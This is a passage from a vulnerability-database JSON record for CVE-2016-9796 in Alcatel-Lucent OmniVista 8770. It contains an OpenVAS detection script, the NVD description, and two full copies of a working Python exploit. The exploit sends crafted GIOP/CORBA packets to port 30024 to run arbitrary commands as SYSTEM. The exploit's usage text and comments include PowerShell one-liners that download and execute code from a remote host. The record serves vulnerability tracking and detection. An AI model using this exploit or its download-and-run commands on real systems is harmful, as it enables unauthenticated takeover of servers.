0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,\n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,\n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,\n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,\n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,\n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );\n", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)", "type": "openvas", "viewCount": 4}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:47:40"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "093f6fa86e4b143448c139412887dda8"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "70cca94720f62109b82fe3d873b630b1"}, {"key": "href", "hash": "cc48873685a1db65f44dc4a65ac3d77f"}, {"key": "modified", "hash": "b709b30efc224af0ca142422dbaffff3"}, {"key": "naslFamily", "hash": "0db377921f4ce762c62526131097968f"}, {"key": "pluginID", "hash": "18f7ae8aaceb897d726f1bf00abd32b1"}, {"key": "published", "hash": "fb634a5017b2a41a91c85626dded43f9"}, {"key": "references", "hash": "9b0c8a560ca98109588056dc2f5375b9"}, {"key": "reporter", "hash": "ea106ff9c2727a6e906e8959871e7c06"}, {"key": "sourceData", "hash": "0622425b32c3b455561de901e639f001"}, {"key": "title", "hash": "35b06cdf6e7f1387d88e10ea205c0816"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "6977374f5569f6b6a574e8e4593169cd8ee7100a01fa223b1b80a16e9c181644", "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9796"]}, {"type": "seebug", "idList": ["SSV:92563"]}, {"type": "exploitdb", "idList": ["EDB-ID:40862"]}, {"type": "zdt", "idList": ["1337DAY-ID-26467"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140026"]}], "modified": "2019-05-29T18:35:33"}, "score": {"value": 9.1, "vector": "NONE", "modified": "2019-05-29T18:35:33"}, "vulnersScore": 9.1}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 12465 2018-11-21 13:24:34Z cfischer $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 12465 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 14:24:34 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40862/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted giop packet request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0.\");\n\n script_tag(name:\"solution\", value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,\n which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! ver = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\nif( ver != \"8770\" ) exit ( 0 );\n\ngiopport = 30024;\n\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,\n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,\n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,\n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,\n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,\n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,\n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,\n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,\n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,\n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,\n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,\n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,\n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,\n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,\n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,\n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,\n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,\n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,\n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\n\ndata = \"\"; # nb: To make openvas-nasl-lint happy...\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data += res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,\n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,\n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,\n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data += res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );", "naslFamily": "General", "pluginID": "1361412562310107112", "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:15:41", "bulletinFamily": "NVD", "description": "Alcatel-Lucent OmniVista 8770 2.0 through 3.0 exposes different ORBs interfaces, which can be queried using the GIOP protocol on TCP port 30024. An attacker can bypass authentication, and OmniVista invokes methods (AddJobSet, AddJob, and ExecuteNow) that can be used to run arbitrary commands on the server, with the privilege of NT AUTHORITY\\SYSTEM on the server. NOTE: The discoverer states \"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue, which means applying proper firewall rules to prevent unauthorised clients to connect to the OmniVista server.\"", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-9796", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9796", "published": "2016-12-03T06:59:00", "title": "CVE-2016-9796", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:38", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92563", "id": "SSV:92563", "type": "seebug", "title": "Alcatel Lucent Omnivista 8770 Remote Code Execution\uff08CVE-2016-9796\uff09", "sourceData": "\n import socket\r\nimport time\r\nimport sys\r\nimport os\r\n \r\n# ref https://blog.malerisch.net/\r\n# Omnivista Alcatel-Lucent running on Windows Server\r\n \r\n \r\nif len(sys.argv) < 2:\r\n print \"Usage: %s <target> <command>\" % sys.argv[0]\r\n print \"eg: %s 192.168.1.246 \\\"powershell.exe -nop -w hidden -c \\$g=new-object net.webclient;IEX \\$g.downloadstring('http://192.168.1.40:8080/hello');\\\"\" % sys.argv[0]\r\n sys.exit(1)\r\n \r\ntarget = sys.argv[1]\r\nargument1 = ' '.join(sys.argv[2:])\r\n \r\n# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly...\r\n \r\nnetbiosname = os.popen(\"nbtscan -s : \"+target+\" | cut -d ':' -f2\").read()\r\nnetbiosname = netbiosname.strip(\"\\n\")\r\n \r\n# dirty functions to do hex magic with bytes...\r\n### each variable has size byte before, which includes the string + \"\\x00\" a NULL byte\r\n### needs to calculate for each\r\n### \r\n \r\ndef calcsize(giop):\r\n \r\n s = len(giop.decode('hex'))\r\n h = hex(s) #\"\\x04\" -> \"04\"\r\n return h[2:].zfill(8) # it's 4 bytes for the size\r\n \r\ndef calcstring(param): # 1 byte size calc\r\n \r\n s = (len(param)/2)+1\r\n h = hex(s)\r\n return h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...\r\n \r\ndef calcstring2(param):\r\n \r\n s = (len(param)/2)+1\r\n h = hex(s)\r\n return h[2:].zfill(4)\r\n \r\n \r\n \r\n##\r\n \r\n#GIOP request size is specified at the 11th byte\r\n \r\n# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............\r\n# d8 is the size of GIOP REQUEST\r\n \r\n# GIOP HEADER Is 12 bytes -\r\n# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte\r\n \r\n \r\n \r\n#phase 1 - add a jobset\r\n \r\ngiopid = 1 # an arbitrary ID can be put there...\r\n \r\n# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right...\r\n \r\nusernamedata = \"xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc\".encode('hex') # original \"383737302061646d696e697374726174696f6e2c6f3d6e6d63\"\r\n \r\n#print \"Size of usernamedata\" + str(len(usernamedata.decode('hex')))\r\n \r\njobname = \"MYJOB01\".encode('hex') # size of 7 bytes # check also in the captured packet...\r\n \r\n \r\naddjobset = \"47494f50010000000000012600000000\" + \"00000001\" + \"01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008\" + jobname + \"00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d\" + usernamedata + \"00000000000a6f6d6e69766973626200\" # this last part can be changed???\r\n \r\nprint \"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch\"\r\nprint \"Connecting to target...\"\r\n \r\n \r\n \r\n \r\np = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\np.connect((target, 30024))\r\n \r\n \r\n#p = remote(target, 30024, \"ipv4\", \"tcp\")\r\n \r\nprint \"Adding a job...\"\r\n \r\np.send(addjobset.decode('hex'))\r\n \r\n#p.recv()\r\n \r\ndata = p.recv(1024)\r\n \r\ns = len(data)\r\n \r\n#objectkey = \"\" # last 16 bytes of the response!\r\n \r\nobjectkey = data[s-16:s].encode('hex')\r\n \r\n#print objectkey\r\n \r\n# phase 2 - active jobset\r\n \r\nprint \"Sending active packet against the job\"\r\n \r\nactivegiopid = 2\r\nactive = \"47494f50010000000000003100000000\" + \"00000002\" + \"0100000000000010\" + objectkey + \"0000000741637469766500000000000000\"\r\n \r\n#print active\r\n \r\np.send(active.decode('hex'))\r\n \r\ndata2 = p.recv(1024)\r\n \r\n#print data2\r\n \r\n# phase3 add task\r\n \r\naddjobid = 3\r\n \r\nprint \"Adding a task....\"\r\n \r\ntaskname = \"BBBBBBB\".encode('hex')\r\nservername = netbiosname.encode('hex')\r\ncommand = \"C:\\Windows\\System32\\cmd.exe\".encode('hex') #on 32bit\r\n#command = \"C:\\Windows\\SysWOW64\\cmd.exe\".encode('hex') #on 64bit\r\ncommandsize = hex((len(command.decode('hex'))+1))\r\ncommandsize = str(commandsize).replace(\"0x\",\"\")\r\n \r\n#print \"Command size: \"+ str(commandsize)\r\n \r\n#print command.decode('hex')\r\n \r\n#time.sleep(10)\r\n \r\n#powershell = str(command)\r\n#powershell = \"powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');\"\r\n \r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n \r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n \r\nargument = str(\"/c \"+argument1).encode('hex')\r\n#argument = str(\"/c notepad.exe\").encode('hex')\r\n \r\n#print len(argument.decode('hex'))\r\n \r\n#argumentsize = len(str(\"/c \"+powershell))+1\r\n \r\n#print \"Argument size: \"+str(argumentsize)\r\n \r\nargumentsize = calcstring2(argument)\r\n \r\n#print \"argument size: \"+str(argumentsize)\r\n \r\n#print argument.decode('hex')\r\n \r\ndef calcpadd(giop):\r\n defaultpadding = \"00000000000001\"\r\n check = giop + defaultpadding + fixedpadding\r\n s = len(check)\r\n #print \"Size: \"+str(s)\r\n if (s/2) % 4 == 0:\r\n #print \"size ok!\"\r\n return check\r\n else:\r\n # fix the default padding\r\n #print \"Size not ok, recalculating padd...\"\r\n dif = (s/2) % 4\r\n #print \"diff: \"+str(dif)\r\n newpadding = defaultpadding[dif*2:]\r\n #print \"Newpadding: \" +str(newpadding)\r\n return giop + newpadding + fixedpadding\r\n \r\n \r\n \r\n \r\naddjobhdr = \"47494f5001000000\" # 8 bytes + 4 bytes for message size, including size of the giop request message\r\n \r\nfixedpadding = \"000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000\"\r\n \r\nvariablepadding = \"000000000001\"\r\n \r\n#print calcstring(servername)\r\n#print calcstring(taskname)\r\n \r\n#print \"Command:\" +str(command)\r\n#print \"command size:\"+str(commandsize)\r\n \r\naddjob = \"00000000000000b30100000000000010\" + objectkey + \"000000074164644a6f62000000000000000000\" + calcstring(taskname) + taskname + \"0000000001000000\"+ commandsize + command +\"00000000\" + calcstring(servername) + servername + \"000000\" + argumentsize + argument + \"00\"\r\n \r\n#print addjob\r\n \r\naddjobfin = calcpadd(addjob)\r\n \r\n#print addjobfin.decode('hex')\r\n \r\naddjobsize = calcsize(addjobfin)\r\n \r\n#print \"Lenght of the addjob: \"+str(len(addjobfin.decode('hex')))\r\n \r\n# we need to add the header\r\n \r\nfinalmsg = addjobhdr + addjobsize + addjobfin\r\n \r\n \r\np.send(finalmsg.decode('hex'))\r\n \r\ndata3 = p.recv(1024)\r\n \r\n#print data3\r\n \r\n# phase4 - execute task\r\n \r\nexecuteid = 4\r\n \r\nprint \"Executing task...\"\r\n \r\nexecute = \"47494f50010000000000003500000000000001100100000000000010\" + objectkey + \"0000000b457865637574654e6f7700000000000000\"\r\n \r\np.send(execute.decode('hex'))\r\n \r\ndata4 = p.recv(1024)\r\n \r\nprint \"All packets sent...\"\r\nprint \"Exploit sequence completed, command should have been executed...:-)\"\r\n \r\np.close()\r\n \r\n# optional requests to remove the job after the exploitation\r\n \r\n### in metasploit, we should migrate to another process and then call an \"abort\" function of Omnivista\r\n \r\n##phase5 - abort the job\r\n \r\ncanceljob = \"47494f500100000000000030000000000000008e0100000000000010\" + objectkey + \"0000000743616e63656c000000000000\"\r\n \r\n###phase6 - delete the jobset \r\n \r\ndeletejob = \"47494f500100000000000038000000000000009e0100000000000010\" + objectkey + \"0000000d44656c6574654a6f625365740000000000000000\"\r\n\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92563"}], "exploitdb": [{"lastseen": "2016-12-04T21:23:20", "bulletinFamily": "exploit", "description": "Alcatel Lucent Omnivista 8770 - Remote Code Execution. CVE-2016-9796. Remote exploit for Windows platform", "modified": "2016-12-04T00:00:00", "published": "2016-12-04T00:00:00", "id": "EDB-ID:40862", "href": "https://www.exploit-db.com/exploits/40862/", "type": "exploitdb", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution", "sourceData": "import socket\r\nimport time\r\nimport sys\r\nimport os\r\n\r\n# ref https://blog.malerisch.net/\r\n# Omnivista Alcatel-Lucent running on Windows Server\r\n\r\n\r\nif len(sys.argv) < 2:\r\n print \"Usage: %s <target> <command>\" % sys.argv[0]\r\n print \"eg: %s 192.168.1.246 \\\"powershell.exe -nop -w hidden -c \\$g=new-object net.webclient;IEX \\$g.downloadstring('http://192.168.1.40:8080/hello');\\\"\" % sys.argv[0]\r\n sys.exit(1)\r\n\r\ntarget = sys.argv[1]\r\nargument1 = ' '.join(sys.argv[2:])\r\n\r\n# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly...\r\n\r\nnetbiosname = os.popen(\"nbtscan -s : \"+target+\" | cut -d ':' -f2\").read()\r\nnetbiosname = netbiosname.strip(\"\\n\")\r\n\r\n# dirty functions to do hex magic with bytes...\r\n### each variable has size byte before, which includes the string + \"\\x00\" a NULL byte\r\n### needs to calculate for each\r\n### \r\n\r\ndef calcsize(giop):\r\n\r\n\ts = len(giop.decode('hex'))\r\n\th = hex(s) #\"\\x04\" -> \"04\"\r\n\treturn h[2:].zfill(8) # it's 4 bytes for the size\r\n\r\ndef calcstring(param): # 1 byte size calc\r\n\t\r\n\ts = (len(param)/2)+1\r\n\th = hex(s)\r\n\treturn h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...\r\n\r\ndef calcstring2(param):\r\n\r\n\ts = (len(param)/2)+1\r\n\th = hex(s)\r\n\treturn h[2:].zfill(4)\r\n\r\n\r\n\r\n##\r\n\r\n#GIOP request size is specified at the 11th byte\r\n\r\n# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............\r\n# d8 is the size of GIOP REQUEST\r\n\r\n# GIOP HEADER Is 12 bytes -\r\n# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte\r\n\r\n\r\n\r\n#phase 1 - add a jobset\r\n\r\ngiopid = 1 # an arbitrary ID can be put there...\r\n\r\n# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right...\r\n\r\nusernamedata = \"xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc\".encode('hex') # original \"383737302061646d696e697374726174696f6e2c6f3d6e6d63\"\r\n\r\n#print \"Size of usernamedata\" + str(len(usernamedata.decode('hex')))\r\n\r\njobname = \"MYJOB01\".encode('hex') # size of 7 bytes # check also in the captured packet...\r\n\r\n\r\naddjobset = \"47494f50010000000000012600000000\" + \"00000001\" + \"01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008\" + jobname + \"00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d\" + usernamedata + \"00000000000a6f6d6e69766973626200\" # this last part can be changed???\r\n\r\nprint \"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch\"\r\nprint \"Connecting to target...\"\r\n\r\n\r\n\r\n\r\np = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\np.connect((target, 30024))\r\n\r\n\r\n#p = remote(target, 30024, \"ipv4\", \"tcp\")\r\n\r\nprint \"Adding a job...\"\r\n\r\np.send(addjobset.decode('hex'))\r\n\r\n#p.recv()\r\n\r\ndata = p.recv(1024)\r\n\r\ns = len(data)\r\n\r\n#objectkey = \"\" # last 16 bytes of the response!\r\n\r\nobjectkey = data[s-16:s].encode('hex')\r\n\r\n#print objectkey\r\n\r\n# phase 2 - active jobset\r\n\r\nprint \"Sending active packet against the job\"\r\n\r\nactivegiopid = 2\r\nactive = \"47494f50010000000000003100000000\" + \"00000002\" + \"0100000000000010\" + objectkey + \"0000000741637469766500000000000000\"\r\n\r\n#print active\r\n\r\np.send(active.decode('hex'))\r\n\r\ndata2 = p.recv(1024)\r\n\r\n#print data2\r\n\r\n# phase3 add task\r\n\r\naddjobid = 3\r\n\r\nprint \"Adding a task....\"\r\n\r\ntaskname = \"BBBBBBB\".encode('hex')\r\nservername = netbiosname.encode('hex')\r\ncommand = \"C:\\Windows\\System32\\cmd.exe\".encode('hex') #on 32bit\r\n#command = \"C:\\Windows\\SysWOW64\\cmd.exe\".encode('hex') #on 64bit\r\ncommandsize = hex((len(command.decode('hex'))+1))\r\ncommandsize = str(commandsize).replace(\"0x\",\"\")\r\n\r\n#print \"Command size: \"+ str(commandsize)\r\n\r\n#print command.decode('hex')\r\n\r\n#time.sleep(10)\r\n\r\n#powershell = str(command)\r\n#powershell = \"powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');\"\r\n\r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n\r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n\r\nargument = str(\"/c \"+argument1).encode('hex')\r\n#argument = str(\"/c notepad.exe\").encode('hex')\r\n\r\n#print len(argument.decode('hex'))\r\n\r\n#argumentsize = len(str(\"/c \"+powershell))+1\r\n\r\n#print \"Argument size: \"+str(argumentsize)\r\n\r\nargumentsize = calcstring2(argument)\r\n\r\n#print \"argument size: \"+str(argumentsize)\r\n\r\n#print argument.decode('hex')\r\n\r\ndef calcpadd(giop):\r\n\tdefaultpadding = \"00000000000001\"\r\n\tcheck = giop + defaultpadding + fixedpadding\r\n\ts = len(check)\r\n\t#print \"Size: \"+str(s)\r\n\tif (s/2) % 4 == 0:\r\n\t\t#print \"size ok!\"\r\n\t\treturn check\r\n\telse:\r\n\t\t# fix the default padding\r\n\t\t#print \"Size not ok, recalculating padd...\"\r\n\t\tdif = (s/2) % 4\r\n\t\t#print \"diff: \"+str(dif)\r\n\t\tnewpadding = defaultpadding[dif*2:]\r\n\t\t#print \"Newpadding: \" +str(newpadding)\r\n\t\treturn giop + newpadding + fixedpadding\r\n\r\n\r\n\r\n\r\naddjobhdr = \"47494f5001000000\" # 8 bytes + 4 bytes for message size, including size of the giop request message\r\n\r\nfixedpadding = \"000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000\"\r\n\r\nvariablepadding = \"000000000001\"\r\n\r\n#print calcstring(servername)\r\n#print calcstring(taskname)\r\n\r\n#print \"Command:\" +str(command)\r\n#print \"command size:\"+str(commandsize)\r\n\r\naddjob = \"00000000000000b30100000000000010\" + objectkey + \"000000074164644a6f62000000000000000000\" + calcstring(taskname) + taskname + \"0000000001000000\"+ commandsize + command +\"00000000\" + calcstring(servername) + servername + \"000000\" + argumentsize + argument + \"00\"\r\n\r\n#print addjob\r\n\r\naddjobfin = calcpadd(addjob)\r\n\r\n#print addjobfin.decode('hex')\r\n\r\naddjobsize = calcsize(addjobfin)\r\n\r\n#print \"Lenght of the addjob: \"+str(len(addjobfin.decode('hex')))\r\n\r\n# we need to add the header\r\n\r\nfinalmsg = addjobhdr + addjobsize + addjobfin\r\n\r\n\r\np.send(finalmsg.decode('hex'))\r\n\r\ndata3 = p.recv(1024)\r\n\r\n#print data3\r\n\r\n# phase4 - execute task\r\n\r\nexecuteid = 4\r\n\r\nprint \"Executing task...\"\r\n\r\nexecute = \"47494f50010000000000003500000000000001100100000000000010\" + objectkey + \"0000000b457865637574654e6f7700000000000000\"\r\n\r\np.send(execute.decode('hex'))\r\n\r\ndata4 = 